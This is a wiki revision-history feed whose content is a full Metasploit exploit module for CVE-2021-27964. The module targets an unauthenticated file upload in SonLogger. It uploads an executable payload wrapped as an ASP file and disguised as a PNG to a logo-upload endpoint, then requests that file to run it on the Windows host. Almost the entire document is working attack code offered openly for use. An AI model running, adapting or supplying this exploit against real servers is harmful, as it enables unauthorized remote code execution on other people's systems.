https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2021-27964_SonLogger_4.2.3.3_%E6%9C%AA%E7%B6%93%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%E6%BC%8F%E6%B4%9E
CVE-2021-27964 SonLogger 4.2.3.3 未經身份驗證任意文件上傳漏洞 - Revision history
2026-04-18T10:36:56Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2021-27964_SonLogger_4.2.3.3_%E6%9C%AA%E7%B6%93%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%E6%BC%8F%E6%B4%9E&diff=1288&oldid=prev
Pwnwiki: Created page with "==MSF EXP== <pre> ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitMod..."
2021-04-09T02:38:15Z
<p>Created page with "==MSF EXP== <pre> ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitMod..."</p>
<p><b>New page</b></p><div>==MSF EXP==<br />
<pre><br />
##<br />
# This module requires Metasploit: https://metasploit.com/download<br />
# Current source: https://github.com/rapid7/metasploit-framework<br />
##<br />
class MetasploitModule < Msf::Exploit::Remote<br />
Rank = NormalRanking<br />
<br />
include Msf::Exploit::EXE<br />
prepend Msf::Exploit::Remote::AutoCheck<br />
include Msf::Exploit::Remote::HttpClient<br />
include Msf::Exploit::FileDropper<br />
<br />
def initialize(info = {})<br />
super(<br />
update_info(<br />
info,<br />
'Name' => 'SonLogger Arbitrary File Upload Exploit',<br />
'Description' => %q{<br />
This module exploits an unauthenticated arbitrary file upload<br />
via insecure POST request. It has been tested on version < 6.4.1 in<br />
Windows 10 Enterprise.<br />
},<br />
'License' => MSF_LICENSE,<br />
'Author' =><br />
[<br />
'Berkan Er <b3rsec@protonmail.com>' # Vulnerability discovery, PoC and Metasploit module<br />
],<br />
'References' =><br />
[<br />
['CVE', '2021-27964'],<br />
['URL', 'https://erberkan.github.io/2021/SonLogger-vulns/']<br />
],<br />
<br />
'Platform' => ['win'],<br />
'Privileged' => false,<br />
'Arch' => [ARCH_X86, ARCH_X64],<br />
'Targets' =><br />
[<br />
[<br />
'SonLogger < 6.4.1',<br />
{<br />
'Platform' => 'win'<br />
}<br />
],<br />
],<br />
'DisclosureDate' => '2021-03-01',<br />
'DefaultTarget' => 0<br />
)<br />
)<br />
<br />
register_options(<br />
[<br />
Opt::RPORT(5000),<br />
OptString.new('TARGETURI', [true, 'The base path to the SonLogger', '/'])<br />
]<br />
)<br />
end<br />
<br />
def check_product_info<br />
send_request_cgi(<br />
'uri' => normalize_uri(target_uri.path, '/shared/GetProductInfo'),<br />
'method' => 'POST',<br />
'data' => '',<br />
'headers' => {<br />
'Accept' => 'application/json, text/javascript, */*; q=0.01',<br />
'Accept-Language' => 'en-US,en;q=0.5',<br />
'Accept-Encoding' => 'gzip, deflate',<br />
'X-Requested-With' => 'XMLHttpRequest'<br />
}<br />
)<br />
end<br />
<br />
def check<br />
begin<br />
res = check_product_info<br />
<br />
unless res<br />
return CheckCode::Unknown('Target is unreachable.')<br />
end<br />
<br />
unless res.code == 200<br />
return CheckCode::Unknown("Unexpected server response: #{res.code}")<br />
end<br />
<br />
version = Gem::Version.new(JSON.parse(res.body)['Version'])<br />
<br />
if version < Gem::Version.new('6.4.1')<br />
CheckCode::Vulnerable("SonLogger version #{version}")<br />
else<br />
CheckCode::Safe("SonLogger version #{version}")<br />
end<br />
rescue JSON::ParserError<br />
fail_with(Failure::UnexpectedReply, 'The target may have been updated')<br />
end<br />
end<br />
<br />
def create_payload<br />
Msf::Util::EXE.to_exe_asp(generate_payload_exe).to_s<br />
end<br />
<br />
def exploit<br />
begin<br />
print_good('Generate Payload')<br />
data = create_payload<br />
<br />
boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(5..14))}"<br />
post_data = "--#{boundary}\r\n"<br />
post_data << "Content-Disposition: form-data; name=\"file\"; filename=\"#{rand_text_alphanumeric(rand(5..11))}.asp\"\r\n"<br />
post_data << "Content-Type: image/png\r\n"<br />
post_data << "\r\n#{data}\r\n"<br />
post_data << "--#{boundary}\r\n"<br />
<br />
res = send_request_cgi(<br />
'method' => 'POST',<br />
'uri' => normalize_uri(target_uri.path, '/Config/SaveUploadedHotspotLogoFile'),<br />
'ctype' => "multipart/form-data; boundary=#{boundary}",<br />
'data' => post_data,<br />
'headers' => {<br />
'Accept' => 'application/json',<br />
'Accept-Language' => 'en-US,en;q=0.5',<br />
'X-Requested-With' => 'XMLHttpRequest'<br />
}<br />
)<br />
unless res<br />
fail_with(Failure::Unreachable, 'No response from server')<br />
end<br />
<br />
unless res.code == 200<br />
fail_with(Failure::Unknown, "Unexpected server response: #{res.code}")<br />
end<br />
<br />
json_res = begin<br />
JSON.parse(res.body)<br />
rescue JSON::ParserError<br />
nil<br />
end<br />
<br />
if json_res.nil? || json_res['Message'] == 'Error in saving file'<br />
fail_with(Failure::UnexpectedReply, 'Error uploading payload')<br />
end<br />
<br />
print_good('Payload has been uploaded')<br />
<br />
handler<br />
<br />
print_status('Executing payload...')<br />
send_request_cgi({<br />
'uri' => normalize_uri(target_uri.path, '/Assets/temp/hotspot/img/logohotspot.asp'),<br />
'method' => 'GET'<br />
}, 5)<br />
end<br />
rescue StandardError<br />
fail_with(Failure::UnexpectedReply, 'Failed to execute the payload')<br />
end<br />
end<br />
</pre></div>
Pwnwiki